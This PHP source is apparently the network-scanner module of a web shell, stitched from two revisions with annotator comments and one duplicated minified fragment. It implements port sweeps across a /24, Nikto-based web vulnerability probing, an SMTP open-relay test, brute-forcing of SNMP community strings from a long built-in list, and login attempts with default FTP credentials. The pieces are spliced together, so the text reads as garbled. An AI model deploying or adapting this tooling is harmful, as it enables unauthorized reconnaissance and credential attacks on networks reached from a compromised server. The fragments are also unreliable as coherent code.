    } else {
        // ---- No action requested: print the three forms ----
        // UDP options appear only when socket_set_timeout is available; otherwise tcp=1 is forced.
        // (Markup as written: '<lable>' tags and a '</u>' closing the '<ul>'.)
        $chbox = checkfunctioN('socket_set_timeout') ? "<ul><li><input type=checkbox name=tcp value=1 checked> <lable>TCP</lable></li><li><input type=checkbox name=udp value=1 checked> <lable>UDP</lable></li></ul>" : '<input type="hidden" name="tcp" value="1">';
        // $host and $_SERVER["HTTP_HOST"] are inserted into value attributes without escaping.
        echo '<form name=port method="POST"><div class="fieldwrapper"><label class="styled" style="width:320px">Port scanner</label></div><div class="fieldwrapper"><label class="styled">Target:</label><div class="thefield"><input type="text" name="target" value="' . $host . '" size="30" /></div></div><div class="fieldwrapper"><label class="styled">From:</label><div class="thefield"><input type="number" min="1" max="65535" name="fromport" value="1" size="30" /></div></div><div class="fieldwrapper"><label class="styled">To:</label><div class="thefield"><input type="number" min="1" max="65535" name="toport" value="1024" size="30" /></div></div><div class="fieldwrapper"><label class="styled">Options:</label><div class="thefield"><ul style="margin-top:0;"><li><label>Timeout:</label> <input type="number" min="1" name="timeout" size="5" value="2"></li>' . $chbox . '</u></div></div>' . $hcwd . 
'<div class="buttonsdiv"><input type="submit" name="portscanner" value="Scan" style="margin-left: 150px;" /></div></form><br /><form name=disc method="POST"><div class="fieldwrapper"><label class="styled" style="width:320px">Discover</label></div><div class="fieldwrapper"><label class="styled">Target:</label><div class="thefield"><input type="text" name="host" value="' . $_SERVER["HTTP_HOST"] . '" size="30" /></div></div><div class="fieldwrapper"><label class="styled">Dictionary:</label><div class="thefield"><input type="text" name="dic" size="30" /></div></div><div class="fieldwrapper"><label class="styled">Search for:</label><div class="thefield"><ul><li><input type=radio value=1 checked name=r1> <label>Directories</label></li><li><input type=radio name=r1 value=0> <label>Subdomains</label></li></ul></div></div>' . $hcwd . '<div class="buttonsdiv"><input type="submit" name="directoryscanner" value="Scan" style="margin-left: 150px;" /></div></form>';
        // Keep the "a.b.c" prefix of the server address to prefill the range form.
        $host = substr($host, 0, strrpos($host, "."));
        $udpf = checkfunctioN('socket_set_timeout') ? '<li><input type=checkbox name=udppscanner value=1 checked onClick="document.security.udpf.disabled = !document.security.udpf.disabled;"> <label>UDP Port scanner:</label> <input name=udport type=text value="53,69,88,111,137,138,139,389,445" size="30"></li>' : '';
        echo '<form name=security method="POST"><div class="fieldwrapper"><label class="styled" style="width:320px">Security scanner</label></div><div class="fieldwrapper"><label class="styled">From:</label><div class="thefield"><input type="text" name="from" value="' . $host . '.1" size="30" /></div></div><div class="fieldwrapper"><label class="styled">To:</label><div class="thefield"><input type="text" name="to" value="' . $host . 
'.255" size="30" /></div></div><div class="fieldwrapper"><label class="styled">Options:</label><div class="thefield"><ul style="margin-top:0;"><li><input type="checkbox" value="1" name="nslookup" checked> <label>NS lookup</label></li><li><label>Timeout:</label> <input type="number" min="1" name="timeout" size="5" value="2"></li><li><input type="checkbox" value="1" name="ping" checked><label>Only scan hosts with echo reply</label></li><li><input type="checkbox" value="1" name="tracert" checked><label>Traceroute</label></li><li><input type=checkbox name=tcppscanner value=1 checked onClick="document.security.port.disabled = !document.security.port.disabled;"> <label>TCP Port scanner:</label> <input name=port type=text value="21,23,25,80,110,135,139,143,443,445,1433,3306,3389,8080,65301" size="30"></li>' . $udpf . '<li><input type=checkbox name=httpbanner value=1 checked> <label>Grab HTTP headers</label></li><li><input type=checkbox name=httpscanner value=1 checked> <label>Webserver security scanning</label></li><li><input type=checkbox name=smtprelay value=1 checked> <label>SMTP relay check</label></li>';
        // The FTP option is offered only when the ftp extension is present.
        if (function_exists('ftp_connect')) {
            echo '<li><input type=checkbox name=ftpscanner value=1 checked onClick="document.security.userpass.disabled = !document.security.userpass.disabled;"> <label>FTP password:</label><input name=userpass type=text value="anonymous:admin@nasa.gov,ftp:ftp,Administrator:[BLANK],guest:[BLANK]" size=30></li>';
        }
        echo '<li><input type=checkbox name=snmpscanner value=1 onClick="document.security.com.disabled = !document.security.com.disabled;" checked> <label>SNMP:</label> <input name=com type=text value="public,private,secret,cisco,write,test,guest,ilmi,ILMI,password,all private,admin,all,system,monitor,sun,agent,manager,ibm,hello,switch,solaris,OrigEquipMfr,default,world,tech,mngt,tivoli,openview,community,snmp,SNMP,none,snmpd,Secret 
C0de,netman,security,pass,passwd,root,access,rmon,rmon_admin,hp_admin,NoGaH$@!,router,agent_steal,freekevin,read,read-only,read-write,0392a0,cable-docsis,fubar,ANYCOM,Cisco router,xyzzy,c,cc,cascade,yellow,blue,internal,comcomcom,IBM,apc,TENmanUFactOryPOWER,proxy,core,CISCO,regional,1234,2read,4changes" size=30></li></u></div></div>' . $hcwd . '<div class="buttonsdiv"><input type="submit" name="securityscanner" value="Scan" style="margin-left: 150px;" /></div></form>';
    }
}
} foreach ($c as $v) { $ret = snmpchecK($ip, $v, $timeout); if ($ret) { $coms .= " {$v} "; } } if ($coms != "") { echo "{$ip}) SNMP FOUND: {$coms}<br>"; $output = 1; } flusheR(); } } if (!empty($_REQUEST['ftpscanner'])) { if (checkthisporT($ip, 21, $timeout)) { $usps = explode(',', $_REQUEST['userpass']); foreach ($usps as $v) { $user = substr($v, 0, strpos($v, ':')); $pass = substr($v, strpos($v, ':') + 1); if ($pass == '[BLANK]') { $pass = ''; } $ftp = @ftp_connect($ip, 21, $timeout); if ($ftp) { if (@ftp_login($ftp, $user, $pass)) { $output = 1; echo "{$ip}) FTP FOUND: ({$user}:{$pass}) <a href=\"ftp://{$ip}\" target=\"_blank\">{$ip}</a> System type: " . ftp_systype($ftp) . "<br>"; } } flusheR();
/**
 * Scanner page, intermediate revision: the /24 "security scanner" and port
 * scanner of the first variant, without the directory/subdomain discoverer,
 * and with flusheR() calls so output streams as it is produced.
 *
 * Differences visible in this revision: the Nikto database is stored under
 * a name from namE() instead of uniqid('BL'); downloadiT, ftp_connect and
 * ftp_login are called with '@' so their warnings are hidden; there is no
 * function_exists('ftp_connect') guard; the FTP result links to ftp://<ip>
 * rather than to the shell's FTP client.
 *
 * Defender notes: request fields are trusted as-is. $target (href), $f,
 * $port, $com, $userpass and the remote answers (PTR names, server banners,
 * Nikto description fields) reach the HTML unescaped. Host artifact: the
 * Nikto 1.36 scan database, fetched over plain HTTP into the temp directory
 * and unlinked at the end of the run.
 *
 * Helpers defined elsewhere in the shell: checkthisporT, flusheR,
 * whereistmP, namE, downloadiT, get_sw_namE, check_urL, checksmtP, snmpchecK.
 */
function scanneR() {
    // Shared form markup (presumably hidden fields) defined elsewhere.
    global $hcwd;
    // Default target shown in the forms: the server's own address.
    if (!empty($_SERVER["SERVER_ADDR"])) {
        $host = $_SERVER["SERVER_ADDR"];
    } else {
        $host = "127.0.0.1";
    }
    $udp = empty($_REQUEST['udp']) ? 0 : 1;
    $tcp = empty($_REQUEST['tcp']) ? 0 : 1;
    if (($udp || $tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])) {
        // ---- Port scanner ----
        // Numeric fields are cast; $target is used verbatim (escaped in the heading, not in the href).
        $target = $_REQUEST['target'];
        $from = (int) $_REQUEST['fromport'];
        $to = (int) $_REQUEST['toport'];
        $timeout = (int) $_REQUEST['timeout'];
        $nu = 0; // running count of open ports, used as the list number
        echo "<font color=blue>Port scanning started against " . htmlspecialchars($target) . ":<br>";
        $start = time();
        for ($i = $from; $i <= $to; $i++) {
            if ($tcp) {
                if (checkthisporT($target, $i, $timeout)) {
                    $nu++;
                    $ser = "";
                    if (getservbyport($i, "tcp")) {
                        $ser = "(" . getservbyport($i, "tcp") . ")";
                    }
                    echo "{$nu}) {$i} {$ser} (<a href=\"telnet://{$target}:{$i}\">Connect</a>) [TCP]<br>";
                }
            }
            if ($udp) {
                // Fourth argument (1) selects the UDP probe.
                if (checkthisporT($target, $i, $timeout, 1)) {
                    $nu++;
                    $ser = "";
                    if (getservbyport($i, "udp")) {
                        $ser = "(" . getservbyport($i, "udp") . ")";
                    }
                    echo "{$nu}) {$i} {$ser} [UDP]<br>";
                }
            }
            flusheR(); // push partial output to the browser after every port
        }
        $time = time() - $start;
        echo "Done! ({$time} seconds)</font>";
    } elseif (!empty($_REQUEST['securityscanner'])) {
        // ---- Security scanner over a /24: a.b.c.<f> up to a.b.c.<to> ----
        echo "<font color=blue>";
        $start = time();
        $from = $_REQUEST['from']; // "a.b.c.d" as typed; not validated or cast
        $to = (int) $_REQUEST['to'];
        $timeout = (int) $_REQUEST['timeout'];
        // Split at the last dot: $f = first host octet (string), $from = "a.b.c" prefix.
        $f = substr($from, strrpos($from, ".") + 1);
        $from = substr($from, 0, strrpos($from, "."));
        if (!empty($_REQUEST['httpscanner'])) {
            // Network/host artifact: the Nikto 1.36 scan database is fetched over plain HTTP
            // into the temp dir (file name from namE()); unlinked after the run.
            echo "Loading webserver bug list...";
            flusheR();
            $buglist = whereistmP() . DIRECTORY_SEPARATOR . namE();
            $dl = @downloadiT('http://www.cirt.net/nikto/UPDATES/1.36/scan_database.db', $buglist);
            if ($dl) {
                $file = file($buglist);
                echo "Done! scanning started.<br><br>";
            } else {
                // $file stays unset, so the per-host Nikto block below is skipped; $buglist is
                // still set, so unlink() runs at the end whether or not the file was created.
                echo "Failed!!! 
scanning started without webserver security testing...<br><br>";
            }
            flusheR();
        } else {
            // Only the prefix is escaped here; $f comes from the request unescaped.
            $fr = htmlspecialchars($from);
            echo "Scanning {$fr}.{$f}-{$fr}.{$to}:<br><br>";
        }
        for ($i = $f; $i <= $to; $i++) {
            $output = 0; // becomes 1 once anything was printed for this host (drives the <hr>)
            $ip = "{$from}.{$i}";
            if (!empty($_REQUEST['nslookup'])) {
                // Reverse DNS; the PTR answer is echoed unescaped (controlled by the scanned host).
                $hn = gethostbyaddr($ip);
                if ($hn != $ip) {
                    echo "{$ip} [{$hn}]<br>";
                }
            }
            flusheR();
            if (!empty($_REQUEST['ipscanner'])) {
                // Comma-separated TCP port list from the request; entries are passed to the probe as-is.
                $port = $_REQUEST['port'];
                if (strstr($port, ",")) {
                    $p = explode(",", $port);
                } else {
                    $p[0] = $port;
                }
                $open = $ser = "";
                foreach ($p as $po) {
                    $scan = checkthisporT($ip, $po, $timeout);
                    if ($scan) {
                        $ser = "";
                        // Assignment is intentional: service name, or false when unknown.
                        if ($ser = getservbyport($po, "tcp")) {
                            $ser = "({$ser})";
                        }
                        $open .= " {$po}{$ser} ";
                    }
                }
                if ($open) {
                    echo "{$ip}) Open ports:{$open}<br>";
                    $output = 1;
                }
                flusheR();
            }
            if (!empty($_REQUEST['httpbanner'])) {
                // get_sw_namE: falsy when nothing answered, -1 when the software could not be
                // identified; otherwise the banner, which is echoed unescaped.
                $res = get_sw_namE($ip, $timeout);
                if ($res) {
                    echo "{$ip}) Webserver software: ";
                    if ($res == -1) {
                        echo "Unknow";
                    } else {
                        echo $res;
                    }
                    echo "<br>";
                    $output = 1;
                }
                flusheR();
            }
            if (!empty($_REQUEST['httpscanner'])) {
                // Only when port 80 answers and the Nikto database was loaded above.
                if (checkthisporT($ip, 80, $timeout) && !empty($file)) {
                    // Expansion lists for the Nikto placeholders @ADMINDIRS / @USERS / @NUKE / @CGIDIRS.
                    $admin = array('/admin/', '/adm/');
                    $users = array('adm', 'bin', 'daemon', 'ftp', 'guest', 'listen', 'lp', 'mysql', 'noaccess', 'nobody', 'nobody4', 'nuucp', 'operator', 'root', 'smmsp', 'smtp', 'sshd', 'sys', 'test', 'unknown', 'uucp', 'web', 'www');
                    $nuke = array('/', '/postnuke/', '/postnuke/html/', '/modules/', '/phpBB/', '/forum/');
                    $cgi = array('/cgi.cgi/', '/webcgi/', '/cgi-914/', '/cgi-915/', '/bin/', '/cgi/', '/mpcgi/', '/cgi-bin/', '/ows-bin/', '/cgi-sys/', '/cgi-local/', '/htbin/', '/cgibin/', '/cgis/', '/scripts/', '/cgi-win/', '/fcgi-bin/', '/cgi-exe/', '/cgi-home/', '/cgi-perl/');
                    foreach ($file as $v) {
                        $vuln = array();
                        $v = trim($v);
                        // Skip blank lines and '#' comments.
                        if (!$v || $v[0] == '#') {
                            continue;
                        }
                        // Rows are quoted CSV ("a","b",...): turn the separators into '^' and
                        // drop the quotes. A '^' inside a field would mis-split the row.
                        $v = str_replace('","', '^', $v);
                        $v = str_replace('"', '', $v);
                        $vuln = explode('^', $v);
                        // Field 1 is the request path; fields 3 and 2 are passed to check_urL
                        // (method and expected status, presumably — confirm against check_urL);
                        // field 4 is the description, echoed unescaped.
                        $page = $cqich = $nukech = $adminch = $userch = $vuln[1];
                        // Only the first placeholder found is expanded (elseif chain); one request per substitution.
                        if (strstr($page, '@CGIDIRS')) {
                            foreach ($cgi as $cg) {
                                
$cqich = str_replace('@CGIDIRS', $cg, $page);
                                $url = "http://{$ip}{$cqich}";
                                $res = check_urL($url, $vuln[3], $vuln[2], $timeout);
                                if ($res) {
                                    $output = 1;
                                    echo "{$ip})" . $vuln[4] . " <a href=\"{$url}\" target=\"_blank\">{$url}</a><br>";
                                }
                                flusheR();
                            }
                        } elseif (strstr($page, '@ADMINDIRS')) {
                            foreach ($admin as $cg) {
                                $adminch = str_replace('@ADMINDIRS', $cg, $page);
                                $url = "http://{$ip}{$adminch}";
                                $res = check_urL($url, $vuln[3], $vuln[2], $timeout);
                                if ($res) {
                                    $output = 1;
                                    echo "{$ip})" . $vuln[4] . " <a href=\"{$url}\" target=\"_blank\">{$url}</a><br>";
                                }
                                flusheR();
                            }
                        } elseif (strstr($page, '@USERS')) {
                            foreach ($users as $cg) {
                                $userch = str_replace('@USERS', $cg, $page);
                                $url = "http://{$ip}{$userch}";
                                $res = check_urL($url, $vuln[3], $vuln[2], $timeout);
                                if ($res) {
                                    $output = 1;
                                    echo "{$ip})" . $vuln[4] . " <a href=\"{$url}\" target=\"_blank\">{$url}</a><br>";
                                }
                                flusheR();
                            }
                        } elseif (strstr($page, '@NUKE')) {
                            foreach ($nuke as $cg) {
                                $nukech = str_replace('@NUKE', $cg, $page);
                                $url = "http://{$ip}{$nukech}";
                                $res = check_urL($url, $vuln[3], $vuln[2], $timeout);
                                if ($res) {
                                    $output = 1;
                                    echo "{$ip})" . $vuln[4] . " <a href=\"{$url}\" target=\"_blank\">{$url}</a><br>";
                                }
                                flusheR();
                            }
                        } else {
                            // No placeholder: request the path literally.
                            $url = "http://{$ip}{$page}";
                            $res = check_urL($url, $vuln[3], $vuln[2], $timeout);
                            if ($res) {
                                $output = 1;
                                echo "{$ip})" . $vuln[4] . 
" <a href=\"{$url}\" target=\"_blank\">{$url}</a><br>";
                            }
                            flusheR();
                        }
                    }
                }
            }
            if (!empty($_REQUEST['smtprelay'])) {
                // Port 25 must answer; checksmtP returning exactly 1 is reported as an open relay.
                if (checkthisporT($ip, 25, $timeout)) {
                    $res = '';
                    $res = checksmtP($ip, $timeout);
                    if ($res == 1) {
                        echo "{$ip}) SMTP relay found.<br>";
                        $output = 1;
                    }
                    flusheR();
                }
            }
            if (!empty($_REQUEST['snmpscanner'])) {
                // UDP/161 must answer; every community string from the request is tried via snmpchecK.
                if (checkthisporT($ip, 161, $timeout, 1)) {
                    $com = $_REQUEST['com'];
                    $coms = $res = "";
                    if (strstr($com, ",")) {
                        $c = explode(",", $com);
                    } else {
                        $c[0] = $com;
                    }
                    foreach ($c as $v) {
                        $ret = snmpchecK($ip, $v, $timeout);
                        if ($ret) {
                            $coms .= " {$v} ";
                        }
                    }
                    if ($coms != "") {
                        echo "{$ip}) SNMP FOUND: {$coms}<br>";
                        $output = 1;
                    }
                    flusheR();
                }
            }
            if (!empty($_REQUEST['ftpscanner'])) {
                // No function_exists('ftp_connect') guard in this revision: without the ftp
                // extension the @ftp_connect call below is a fatal undefined-function error.
                if (checkthisporT($ip, 21, $timeout)) {
                    // "user:pass,user:pass" list from the request; the literal [BLANK] means an empty password.
                    $usps = explode(',', $_REQUEST['userpass']);
                    foreach ($usps as $v) {
                        $user = substr($v, 0, strpos($v, ':'));
                        $pass = substr($v, strpos($v, ':') + 1);
                        if ($pass == '[BLANK]') {
                            $pass = '';
                        }
                        // A fresh connection per credential pair, warnings suppressed; never ftp_close()d.
                        $ftp = @ftp_connect($ip, 21, $timeout);
                        if ($ftp) {
                            if (@ftp_login($ftp, $user, $pass)) {
                                $output = 1;
                                echo "{$ip}) FTP FOUND: ({$user}:{$pass}) <a href=\"ftp://{$ip}\" target=\"_blank\">{$ip}</a> System type: " . ftp_systype($ftp) . "<br>";
                            }
                        }
                        flusheR();
                    }
                }
            }
            if ($output) {
                echo "<hr size=1 noshade>";
            }
            flusheR();
        }
        $time = time() - $start;
        echo "Done! ({$time} seconds)</font>";
        // Remove the downloaded Nikto database (set only when httpscanner was requested).
        if (!empty($buglist)) {
            unlink($buglist);
        }
    } else {
        // ---- No action requested: print the two forms ----
        // UDP is offered only when the sockets extension is loaded; otherwise tcp=1 is forced via a hidden field.
        $chbox = extension_loaded('sockets') ? 
"<input type=checkbox name=tcp value=1 checked>TCP<input type=checkbox name=udp value=1 checked>UDP" : "<input type=hidden name=tcp value=1>";
        // $host is inserted into the value attribute without quoting or escaping.
        echo "<center><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\"><td>Port scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">Target:</td><td bgcolor=\"#808080\" width=80%><input name=target value={$host} size=40></td></tr><tr><td bgcolor=\"#666666\" width=25%>From:</td><td bgcolor=\"#666666\" width=25%><input name=fromport type=text value=\"1\" size=5></td></tr><tr><td bgcolor=\"#808080\" width=25%>To:</td><td bgcolor=\"#808080\" width=25%><input name=toport type=text value=\"1024\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Timeout:</td><td bgcolor=\"#666666\"><input name=timeout type=text value=\"2\" size=5></td><tr><td width=\"25%\" bgcolor=\"#808080\">{$chbox}</td><td bgcolor=\"#808080\" align=\"right\">{$hcwd}<input type=submit class=buttons name=portscanner value=Scan></td></tr></form></table>";
        // Keep the "a.b.c" prefix of the server address to prefill the range form.
        $host = substr($host, 0, strrpos($host, "."));
        echo "<br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\" name=security><td>security scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">From:</td><td bgcolor=\"#808080\" width=80%><input name=from value={$host}.1 size=40> <input type=checkbox value=1 style=\"border-width:1px;background-color:#808080;\" name=nslookup checked>NS lookup</td></tr><tr><td bgcolor=\"#666666\" width=25%>To:</td><td bgcolor=\"#666666\" width=25%>xxx.xxx.xxx.<input name=to type=text value=254 size=4>{$hcwd}</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Timeout:</td><td bgcolor=\"#808080\"><input name=timeout type=text value=\"2\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ipscanner value=1 checked 
onClick=\"document.security.port.disabled = !document.security.port.disabled;\" style=\"border-width:1px;background-color:#666666;\">Port scanner:</td><td bgcolor=\"#666666\"><input name=port type=text value=\"21,23,25,80,110,135,139,143,443,445,1433,3306,3389,8080,65301\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=httpbanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Get web banner</td><td bgcolor=\"#808080\"><input type=checkbox name=httpscanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Webserver security scanning <input type=checkbox name=smtprelay value=1 checked style=\"border-width:1px;background-color:#808080;\">SMTP relay check</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ftpscanner value=1 checked onClick=\"document.security.userpass.disabled = !document.security.userpass.disabled;\" style=\"border-width:1px;background-color:#666666;\">FTP password:</td><td bgcolor=\"#666666\"><input name=userpass type=text value=\"anonymous:admin@nasa.gov,ftp:ftp,Administrator:[BLANK],guest:[BLANK]\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=snmpscanner value=1 onClick=\"document.security.com.disabled = !document.security.com.disabled;\" checked style=\"border-width:1px;background-color:#808080;\">SNMP:</td><td bgcolor=\"#808080\"><input name=com type=text value=\"public,private,secret,cisco,write,test,guest,ilmi,ILMI,password,all private,admin,all,system,monitor,agent,manager,OrigEquipMfr,default,tivoli,openview,community,snmp,snmpd,Secret C0de,security,rmon,rmon_admin,hp_admin,NoGaH\$@!,agent_steal,freekevin,0392a0,cable-docsis,fubar,ANYCOM,Cisco router,xyzzy,c,cc,cascade,yellow,blue,internal,comcomcom,apc,TENmanUFactOryPOWER,proxy,core,regional\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=\"right\"><input type=submit class=buttons 
name=securityscanner value=Scan></td></tr></form></table></center><br><center>";
    }
}